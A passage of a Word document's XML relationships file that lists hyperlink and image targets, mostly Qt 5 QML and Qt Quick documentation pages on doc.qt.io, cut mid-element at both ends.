TargetMode="External"/><Relationship Id="rId2065" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-shadereffect.html" TargetMode="External"/><Relationship Id="rId2272" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-gridview.html" TargetMode="External"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId689" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/obsoleteqmltypes.html" TargetMode="External"/><Relationship Id="rId896" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-distancereading.html" TargetMode="External"/><Relationship Id="rId1081" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-mediaplayer-qml-dynamic.html" TargetMode="External"/><Relationship Id="rId2577" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId2784" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId451" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/qml-uses-visual-rectangles.png" TargetMode="External"/><Relationship Id="rId549" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquickcontrols-gallery-example.html" TargetMode="External"/><Relationship Id="rId756" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-behavior.html" TargetMode="External"/><Relationship Id="rId1179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtmultimedia-playlistitem.html" TargetMode="External"/><Relationship Id="rId1386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-toolbar.html" TargetMode="External"/><Relationship Id="rId1593" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-window-qmlmodule.html" TargetMode="External"/><Relationship Id="rId2132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometrynode.html" TargetMode="External"/><Relationship Id="rId2437" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2991" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/cameraoverview.html" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-imports.html" TargetMode="External"/><Relationship Id="rId409" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pathview.html" TargetMode="External"/><Relationship Id="rId963" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-gravity.html" TargetMode="External"/><Relationship Id="rId1039" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-roundbutton.html" TargetMode="External"/><Relationship Id="rId1898" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/visual-coordinates-example.png" TargetMode="External"/><Relationship Id="rId2644" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-delegatemodel.html" TargetMode="External"/><Relationship Id="rId2851" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickimageresponse.html" TargetMode="External"/><Relationship Id="rId2949" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qmlapplications.html" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-signals.html" TargetMode="External"/><Relationship Id="rId616" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qvariant.html" TargetMode="External"/><Relationship Id="rId823" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-checkdelegate.html" TargetMode="External"/><Relationship Id="rId1453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwebengine-webenginehistory.html" TargetMode="External"/><Relationship Id="rId1660" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlmodule.html" TargetMode="External"/><Relationship Id="rId1758" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html" TargetMode="External"/><Relationship Id="rId2504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-springanimation.html" TargetMode="External"/><Relationship Id="rId2711" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-textinput.html" TargetMode="External"/><Relationship Id="rId2809" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickframebufferobject-renderer.html" TargetMode="External"/><Relationship Id="rId1106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-multipointtoucharea.html" TargetMode="External"/><Relationship Id="rId1313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-stackview.html" TargetMode="External"/><Relationship Id="rId1520" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-connections.html" TargetMode="External"/><Relationship Id="rId1965" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-signalspy.html" TargetMode="External"/><Relationship Id="rId1618" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1825" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-effects-particles.html" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId2087" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgmaterial.html" TargetMode="External"/><Relationship Id="rId2294" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/manual-layout.png" TargetMode="External"/><Relationship Id="rId266" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId473" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-index.html" TargetMode="External"/><Relationship Id="rId680" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-locale.html" TargetMode="External"/><Relationship Id="rId2154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometrynode.html" TargetMode="External"/><Relationship Id="rId2361" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId2599" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-repeater.html" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-url.html" TargetMode="External"/><Relationship Id="rId333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-modules-qmldir.html" TargetMode="External"/><Relationship Id="rId540" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-menu.html" TargetMode="External"/><Relationship Id="rId778" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-buttonstyle.html" TargetMode="External"/><Relationship Id="rId985" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-horizontalstackedbarseries.html" TargetMode="External"/><Relationship Id="rId1170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pincharea.html" TargetMode="External"/><Relationship Id="rId2014" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId2221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html" TargetMode="External"/><Relationship Id="rId2459" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-propertyanimation.html" TargetMode="External"/><Relationship Id="rId2666" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-tutorials-extending-qml-example.html" TargetMode="External"/><Relationship Id="rId2873" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qwindow.html" TargetMode="External"/><Relationship Id="rId638" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qvariant.html" TargetMode="External"/><Relationship Id="rId845" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-compassreading.html" TargetMode="External"/><Relationship Id="rId1030" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-keyevent.html" TargetMode="External"/><Relationship Id="rId1268" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls-styles-scrollviewstyle.html" TargetMode="External"/><Relationship Id="rId1475" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-xmllistmodel-xmlrole.html" TargetMode="External"/><Relationship Id="rId1682" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-rowlayout.html" TargetMode="External"/><Relationship Id="rId2319" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2526" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-sprite.html" TargetMode="External"/><Relationship Id="rId2733" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-propertybinding.html" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-javascript-qmlglobalobject.html" TargetMode="External"/><Relationship Id="rId705" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-accelerometer.html" TargetMode="External"/><Relationship Id="rId1128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-openglinfo.html" TargetMode="External"/><Relationship Id="rId1335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-supplier.html" TargetMode="External"/><Relationship Id="rId1542" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1987" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId2940" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qvariant.html" TargetMode="External"/><Relationship Id="rId912" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-enterkey.html" TargetMode="External"/><Relationship Id="rId1847" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-system-content-dynamiccomparison-qml.html" TargetMode="External"/><Relationship Id="rId2800" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickitem.html" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-propertybinding.html" TargetMode="External"/><Relationship Id="rId1402" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-virtualkeyboard-styles-traceinputkeypanel.html" TargetMode="External"/><Relationship Id="rId1707" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-imports.html" TargetMode="External"/><Relationship Id="rId1914" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId495" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-statemachine-state.html" TargetMode="External"/><Relationship Id="rId2176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId2383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-flow.html" TargetMode="External"/><Relationship Id="rId2590" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-definetypes.html" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId562" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/resources.html" TargetMode="External"/><Relationship Id="rId1192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtpositioning-positionsource.html" TargetMode="External"/><Relationship Id="rId2036" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-imageelements-example.html" TargetMode="External"/><Relationship Id="rId2243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-qmlscene.html" TargetMode="External"/><Relationship Id="rId2450" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-pauseanimation.html" TargetMode="External"/><Relationship Id="rId2688" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-mouseevent.html" TargetMode="External"/><Relationship Id="rId2895" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-cppintegration-definetypes.html" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-definetypes.html" TargetMode="External"/><Relationship Id="rId867" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-custom3dlabel.html" TargetMode="External"/><Relationship Id="rId1052" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-models-listmodel.html" TargetMode="External"/><Relationship Id="rId1497" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-documents-scope.html" TargetMode="External"/><Relationship Id="rId2103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://doc.qt.io/qt-5/images/visualize-overdraw-2.png" TargetMode="External"/><Relationship Id="rId2310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId2548" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId2755" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2962" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-usecase-animations.html" TargetMode="External"/><Relationship Id="rId727" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-animatedsprite.html" TargetMode="External"/><Relationship Id="rId934" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-fontdialog.html" TargetMode="External"/><Relationship Id="rId1357" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtsensors-tapsensor.html" TargetMode="External"/><Relationship Id="rId1564" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtqml-qt.html" TargetMode="External"/><Relationship Id="rId1771" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-stacklayout.html" TargetMode="External"/><Relationship Id="rId2408" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rotationanimator.html" TargetMode="External"/><Relationship Id="rId2615" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId2822" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsggeometry-point2d.html" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3schools.com/jsref/default.asp" TargetMode="External"/><Relationship Id="rId1217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-controls2-radiobutton.html" TargetMode="External"/><Relationship Id="rId1424" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-vbarmodelmapper.html" TargetMode="External"/><Relationship Id="rId1631" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.w3.org/TR/xpath20/" TargetMode="External"/><Relationship Id="rId1869" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-groupgoal.html" TargetMode="External"/><Relationship Id="rId1729" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-layouts-layout.html" TargetMode="External"/><Relationship Id="rId1936" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qttest-testcase.html" TargetMode="External"/><Relationship Id="rId2198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-input-focus.html" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qquickview.html" TargetMode="External"/><Relationship Id="rId584" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-imageparticle.html" TargetMode="External"/><Relationship Id="rId2058" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-item.html" TargetMode="External"/><Relationship Id="rId2265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-listview.html" TargetMode="External"/><Relationship Id="rId3011" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtglobal.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId237" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlengine.html" TargetMode="External"/><Relationship Id="rId791" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-render-cameralens.html" TargetMode="External"/><Relationship Id="rId889" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-extras-diffusemapmaterial.html" TargetMode="External"/><Relationship Id="rId1074" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtcharts-margins.html" TargetMode="External"/><Relationship Id="rId2472" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-animation-example.html" TargetMode="External"/><Relationship Id="rId2777" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtqml-syntax-signals.html" TargetMode="External"/><Relationship Id="rId444" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtdoc/qtquick-usecase-visual.html" TargetMode="External"/><Relationship Id="rId651" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-workerscript.html" TargetMode="External"/><Relationship Id="rId749" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtdatavisualization-bar3dseries.html" TargetMode="External"/><Relationship Id="rId1281" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-shape.html" TargetMode="External"/><Relationship Id="rId1379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwinextras-thumbnailtoolbutton.html" TargetMode="External"/><Relationship Id="rId1586" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-module.html" TargetMode="External"/><Relationship Id="rId2125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgnode.html" TargetMode="External"/><Relationship Id="rId2332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-anchorchanges.html" TargetMode="External"/><Relationship Id="rId2984" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtsensors-qmlmodule.html" TargetMode="External"/><Relationship Id="rId304" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://qt-project.org/doc/qt-5.1/qtqml/qtqml-modules-identifiedmodules.html" TargetMode="External"/><Relationship Id="rId511" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-positioning-topic.html" TargetMode="External"/><Relationship Id="rId609" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-zoomblur.html" TargetMode="External"/><Relationship Id="rId956" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtgraphicaleffects-glow.html" TargetMode="External"/><Relationship Id="rId1141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-particles-particlegroup.html" TargetMode="External"/><Relationship Id="rId1239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-repeater.html" TargetMode="External"/><Relationship Id="rId1793" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-dialogs-dialog.html" TargetMode="External"/><Relationship Id="rId2637" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qabstractitemmodel.html" TargetMode="External"/><Relationship Id="rId2844" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qsgtexture.html" TargetMode="External"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qobject.html" TargetMode="External"/><Relationship Id="rId816" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtlocation-categorymodel.html" TargetMode="External"/><Relationship Id="rId1001" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qt3d-input-inputsettings.html" TargetMode="External"/><Relationship Id="rId1446" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtwayland-compositor-waylandsurface.html" TargetMode="External"/><Relationship Id="rId1653" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html" TargetMode="External"/><Relationship Id="rId1860" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qtquick-particles-qmlmodule.html" TargetMode="External"/><Relationship Id="rId2704" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qml-qtquick-rectangle.html" TargetMode="External"/><Relationship Id="rId2911" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://doc.qt.io/qt-5/qqmlproperty.html" TargetMode="External"/><Relationship Id="rId1306" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 